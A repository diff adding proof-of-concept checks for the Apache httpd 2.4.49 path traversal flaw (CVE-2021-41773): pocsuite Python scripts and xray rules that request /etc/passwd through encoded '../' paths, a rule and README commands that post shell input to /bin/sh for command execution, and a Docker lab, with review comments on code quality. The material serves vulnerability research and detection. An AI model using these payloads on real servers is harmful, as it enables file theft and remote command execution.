+ vulDate = 'Wed Sep 29 2021 00:00:00 GMT+0800 (China Standard Time)'
+ author = 'pcmgr'
+ createDate = ''
+ updateDate = 'Fri Nov 26 2021 14:44:39 GMT+0800 (China Standard Time)'
+ references = '''[]'''
+ name = '''Apache Httpd 2.4.49任意文件读取&远程命令执行漏洞'''
+ cve = 'CVE-2021-41773'
+ appPowerLink = ''
+ appName = 'Apache-Web-Server'
+ appVersion = '2.4.49'
+ vulType = '任意文件读取'
+ vulGrade = '高危'
+ vulRepair = '''升级到最新版本'''
+ desc = '''Apache Httpd 2.4.49存在任意文件读取漏洞,在 配置为 Require all granted 时,会造成此漏洞'''
+ samples = ''''''
+
+ def _verify(self):
+ result = {}
+ if self.url[-1] == '/':
+ self.url = self.url[:-1]
+ payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+
+ target = self.url+payload
+
+ try:
+ resp = urllib2.urlopen(target)
+ data = resp.read()
+ if "root:" in data:
+ result['VerifyInfo'] = {}
+ result['VerifyInfo']['URL'] = resp.url
+ except Exception as err:
+ print(err)
+ pass
+ return self.parse_output(result)
+
+ def parse_output(self, result):
+ # parse output
+ output = Output(self)
+ if result:
+ output.success(result)
+ return output
+
+ def _attack(self):
+ return self._verify()
+
+
+
+
+
+
+
+register(TestPOC)
\ No newline at end of file
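Review bot: `_verify` opens `resp` with `urllib2.urlopen` at L4674 and never closes it, and the `except Exception` at L4679 prints and continues, so a network failure is indistinguishable from "not vulnerable" in the returned Output. Closing the response (`resp.close()` after `data = resp.read()`, or a `contextlib.closing` block) and dropping the redundant `pass` after `print(err)` are the small fixes. `self.url[-1]` at L4667 raises IndexError on an empty url, where `self.url = self.url.rstrip('/')` is both safe and shorter. `re` is imported and unused, and `urllib2` makes the file Python 2 only, which matches the pocsuite2 directory but is worth stating in a module comment since the repository also ships a pocsuite3 version of the same check.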
diff --git a/2021/CVE-2021-41773/poc/pocsuite3/CVE-2021-41773.py b/2021/CVE-2021-41773/poc/pocsuite3/CVE-2021-41773.py
new file mode 100644
index 000000000..605018d75
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/pocsuite3/CVE-2021-41773.py
@@ -0,0 +1,94 @@
+from collections import OrderedDict
+import urllib.parse
+import re
+from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, OptString, VUL_TYPE
+from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
+from requests.api import patch
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+# 禁用安全请求警告
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+class POC(POCBase):
+ vulID = '0' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
+ version = '1' #默认为1
+ author = ['luckying'] # PoC作者的大名
+ vulDate = '2021-10-07' #漏洞公开的时间,不知道就写今天
+ createDate = '2021-10-07' # 编写 PoC 的日期
+ updateDate = '2021-10-07' # PoC 更新的时间,默认和编写时间一样
+ references = [''] # 漏洞地址来源,0day不用写
+ name = 'Apache 2.4.49' # PoC 名称
+ appPowerLink = '' # 漏洞厂商主页地址
+ appName = 'Apache HTTP服务目录遍历 (CVE-2021-41773)' # 漏洞应用名称
+ appVersion = '''Apache 2.4.49''' # 漏洞影响版本
+ vulType = VUL_TYPE.ARBITRARY_FILE_DOWNLOAD #漏洞类型,类型参考见 漏洞类型规范表
+ desc = '''
+ Apache HTTP服务目录遍历 (CVE-2021-41773)
+ '''
+
+ # 漏洞简要描述
+ samples = [''] # 测试样列,就是用 PoC 测试成功的网站
+ install_requires = [''] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
+ pocDesc = '''
+ 检测:pocsuite -r .\poc++.py -u url(-f url.txt) --verify
+ 利用:pocsuite -r .\poc++.py -u url(-f url.txt) --attack --path '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ '''
+ category = POC_CATEGORY.EXPLOITS.REMOTE
+
+ def _options(self):
+ o = OrderedDict()
+ o["path"] = OptString(default='/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd',description='输入文件路径',require=False)
+ return o
+ def _verify(self):
+ result = {}
+ path = '/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ url = self.url + path
+ try:
+ r=requests.Request('GET', url).prepare()
+ r.url=url
+ resq=requests.session().send(r,timeout=5,verify=False)
+ if resq and resq.status_code == 200 and "root:x" in resq.text:
+ result['VerifyInfo'] = {}
+ result['VerifyInfo']['URL'] = url
+ result['VerifyInfo']['POC'] = path
+ except Exception as e:
+ return
+ return self.parse_output(result)
+
+ def _attack(self):
+ result = {}
+ file = self.get_option("path")
+ url = self.url + file
+ try:
+ r=requests.Request('GET', url).prepare()
+ r.url=url
+ resq=requests.session().send(r,timeout=5,verify=False)
+ t = resq.text
+ print('output >>> \n' + t)
+ t = t.replace(" ", "")
+ result['VerifyInfo'] = {}
+ result['VerifyInfo']['URL'] = url
+ result['VerifyInfo']['Name'] = t
+ except Exception as e:
+ return
+
+ def parse_attack(self, result):
+ output = Output(self)
+ if result:
+ output.success(result)
+ else:
+ output.fail('target is not vulnerable')
+ return output
+
+ def _shell(self):
+ return
+
+ def parse_output(self, result):
+ output = Output(self)
+ if result:
+ output.success(result)
+ else:
+ output.fail('target is not vulnerable')
+ return output
+
+register_poc(POC)
\ No newline at end of file
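Review bot: `_attack` (L4765) never returns an `Output`: the `try` body falls off the end after populating `result`, and the `except` at L4779 returns `None`, so `parse_attack` is dead code and pocsuite prints nothing for `--attack`; the method should end with `return self.parse_attack(result)` after the `try`/`except`, with the `except` falling through to it instead of returning. Both `except Exception as e: return` clauses (L4761, L4779) swallow connection errors silently; `logger` is already imported, so `logger.debug(e)` before leaving the handler would keep failures visible. `urllib.parse`, `re`, `from requests.api import patch` and `REVERSE_PAYLOAD` are unused imports, and `requests.session().send(..., verify=False)` together with the disabled `InsecureRequestWarning` deserves a comment stating that certificate checking is intentionally off so a later maintainer does not mistake it for an oversight.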
diff --git a/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-path-traversal.yml b/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-path-traversal.yml
new file mode 100644
index 000000000..ce1b62bca
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-path-traversal.yml
@@ -0,0 +1,21 @@
+name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
+manual: true
+transport: http
+rules:
+ cgibin0:
+ request:
+ cache: true
+ method: GET
+ path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
+ expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+ icons0:
+ request:
+ cache: true
+ method: GET
+ path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
+ expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+expression: cgibin0() || icons0()
+detail:
+ author: JingLing(https://github.com/shmilylty)
+ links:
+ - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
\ No newline at end of file
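Review bot: The `detail` block carries only an author and a WeChat article, so a reader of this rule gets no statement of what a positive match means or where the authoritative advisory lives; the README added in this same commit cites `https://httpd.apache.org/security/vulnerabilities_24.html`, and the sibling rce rule cites NVD, so the two rules are inconsistent with each other and with the docs. Add a `description:` under `detail` along the lines of `description: Apache HTTP Server 2.4.49 path normalization flaw (CVE-2021-41773); reports when a traversal request under /cgi-bin/ or /icons/ returns /etc/passwd content` and put the vendor advisory first in `links`. The same gap applies to apache-httpd-cve-2021-41773-rce.yml in the next hunk. The `cgibin0`/`icons0` pair could also carry a one-line `#` comment saying why both prefixes are tried, which the README later explains (the aliased directory must exist and be accessible).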
diff --git a/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-rce.yml b/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-rce.yml
new file mode 100644
index 000000000..b92d5db44
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/xray/apache-httpd-cve-2021-41773-rce.yml
@@ -0,0 +1,19 @@
+name: poc-yaml-apache-httpd-cve-2021-41773-rce
+manual: true
+transport: http
+set:
+ r1: randomInt(800000000, 1000000000)
+ r2: randomInt(800000000, 1000000000)
+rules:
+ r0:
+ request:
+ cache: true
+ method: POST
+ path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
+ body: echo;expr {{r1}} + {{r2}}
+ expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+expression: r0()
+detail:
+ author: B1anda0(https://github.com/B1anda0)
+ links:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
\ No newline at end of file
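Review bot: The oracle design in `r0` is good but undocumented: the request body asks for `expr {{r1}} + {{r2}}` with two fresh random operands and the expression checks for their sum, so a reflected request body or a cached page cannot satisfy the check. That intent is worth a comment above `set:`, e.g. `# r1/r2 are regenerated per run; only a server that actually evaluated the arithmetic can return their sum`, so a future edit does not replace it with a static marker string. A `description:` under `detail` is also missing here, as noted on the path-traversal rule.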
diff --git a/2021/CVE-2021-41773/vultarget/1.png b/2021/CVE-2021-41773/vultarget/1.png
new file mode 100644
index 000000000..6499d1f79
Binary files /dev/null and b/2021/CVE-2021-41773/vultarget/1.png differ
diff --git a/2021/CVE-2021-41773/vultarget/2.png b/2021/CVE-2021-41773/vultarget/2.png
new file mode 100644
index 000000000..19248b99c
Binary files /dev/null and b/2021/CVE-2021-41773/vultarget/2.png differ
diff --git a/2021/CVE-2021-41773/vultarget/Dockerfile b/2021/CVE-2021-41773/vultarget/Dockerfile
new file mode 100644
index 000000000..d720a88df
--- /dev/null
+++ b/2021/CVE-2021-41773/vultarget/Dockerfile
@@ -0,0 +1,14 @@
+FROM vulhub/httpd:2.4.49
+
+LABEL maintainer="phithon "
+
+RUN set -ex \
+ && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
+ && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
+ && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
+ && cat /usr/local/apache2/conf/httpd.conf \
+ | tr '\n' '\r' \
+ | perl -pe 's|.*?|\n AllowOverride none\n Require all granted\n|isg' \
+ | tr '\r' '\n' \
+ | tee /tmp/httpd.conf \
+ && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf
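Review bot: The `perl -pe` substitution has a pattern of bare `.*?`, which matches the empty string; combined with `/g` it would splice the replacement text between every character of httpd.conf rather than rewriting one block, so the image would not start as committed. This looks like the angle-bracketed `<Directory />` … `</Directory>` tags around the pattern and replacement were stripped when the file passed through a renderer — the trailing space in `LABEL maintainer="phithon "` suggests a bracketed e-mail was lost the same way — so compare the line against the upstream vulhub Dockerfile before merging. The step also deserves a why-comment, since it is the precondition the README describes: `# Lab precondition: replaces the root <Directory /> block with 'Require all granted' so traversal outside the docroot is not stopped by the default 'Require all denied' (see README)`.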
diff --git a/2021/CVE-2021-41773/vultarget/README.md b/2021/CVE-2021-41773/vultarget/README.md
new file mode 100644
index 000000000..de12183be
--- /dev/null
+++ b/2021/CVE-2021-41773/vultarget/README.md
@@ -0,0 +1,47 @@
+# Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows.
+
+A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root.
+
+If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.
+
+References:
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/ptswarm/status/1445376079548624899
+- https://twitter.com/HackerGautam/status/1445412108863041544
+- https://twitter.com/snyff/status/1445565903161102344
+
+## Vulnerable environment
+
+Execute following commands to start a vulnerable Apache HTTP Server:
+
+```
+docker-compose build
+docker-compose up -d
+```
+
+After the server is started, you can see the default page which says `It works!` of Apache HTTP Server through `http://your-ip:8080`.
+
+## Exploit
+
+A simple CURL command to reproduce the vulnerability (Note that `/icons/` must be a existing directory):
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+```
+
+The `/etc/passwd` is disclosured successfully:
+
+![](1.png)
+
+With the mods cgi or cgid enabled on the server, this path traversal vulnerability would allow arbitrary command execution:
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
+```
+
+![](2.png)
diff --git a/2021/CVE-2021-41773/vultarget/README.zh-cn.md b/2021/CVE-2021-41773/vultarget/README.zh-cn.md
new file mode 100644
index 000000000..39cd8b107
--- /dev/null
+++ b/2021/CVE-2021-41773/vultarget/README.zh-cn.md
@@ -0,0 +1,46 @@
+# Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)
+
+Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:
+
+- 版本等于2.4.49
+- 穿越的目录允许被访问,比如配置了`Require all granted`。(默认情况下是不允许的)
+
+攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
+
+参考链接:
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/ptswarm/status/1445376079548624899
+- https://twitter.com/HackerGautam/status/1445412108863041544
+- https://twitter.com/snyff/status/1445565903161102344
+
+## 漏洞环境
+
+执行如下命令编译及运行一个存在漏洞的Apache HTTPd 2.4.49版本服务器:
+
+```
+docker-compose build
+docker-compose up -d
+```
+
+环境启动后,访问`http://your-ip:8080`即可看到Apache默认的`It works!`页面。
+
+## 漏洞利用
+
+使用如下CURL命令来发送Payload(注意其中的`/icons/`必须是一个存在且可访问的目录):
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+```
+
+可见,成功读取到`/etc/passwd`:
+
+![](1.png)
+
+在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
+```
+
+![](2.png)
diff --git a/2021/CVE-2021-41773/vultarget/docker-compose.yml b/2021/CVE-2021-41773/vultarget/docker-compose.yml
new file mode 100644
index 000000000..376995733
--- /dev/null
+++ b/2021/CVE-2021-41773/vultarget/docker-compose.yml
@@ -0,0 +1,6 @@
+version: '2'
+services:
+ apache:
+ build: .
+ ports:
+ - "8080:80"
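Review bot: `"8080:80"` publishes the deliberately vulnerable httpd on every interface of the host, so anything on the same network can reach a server that discloses files and, per the Dockerfile, has CGI enabled. If the lab is meant to be exercised from the host only, bind to loopback with `- "127.0.0.1:8080:80"` and adjust the README's `http://your-ip:8080` wording; if remote access is intended, say in the README that the host should sit on an isolated network. Either way the compose file should carry a comment stating which of the two was chosen.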
diff --git a/2021/CVE-2021-43287/poc/xray/CVE-2021-43287.yaml b/2021/CVE-2021-43287/poc/xray/CVE-2021-43287.yml
similarity index 100%
rename from 2021/CVE-2021-43287/poc/xray/CVE-2021-43287.yaml
rename to 2021/CVE-2021-43287/poc/xray/CVE-2021-43287.yml